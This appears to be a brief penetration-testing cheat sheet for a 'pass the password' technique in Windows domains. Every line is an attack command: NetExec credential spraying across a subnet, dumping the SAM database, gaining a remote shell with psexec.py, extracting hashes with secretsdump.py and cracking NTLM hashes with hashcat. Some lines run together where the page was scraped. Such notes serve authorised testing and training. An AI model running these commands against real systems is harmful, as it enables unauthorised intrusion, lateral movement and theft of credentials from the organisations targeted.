Pass the Password
nxc $network_ip/$cidr -d $domain -u $user -p $password# dumping sam file
nxc $network_ip/$cidr -d $domain -u $user -p $password --sam
psexec.py $domain/$username:$password@$machine_ip
# dump hashes
secretsdump.py $domain/$username:$password@$machine_ip
# crack hashes
hashcat -m 1000 hashfile dict_file -OLast updated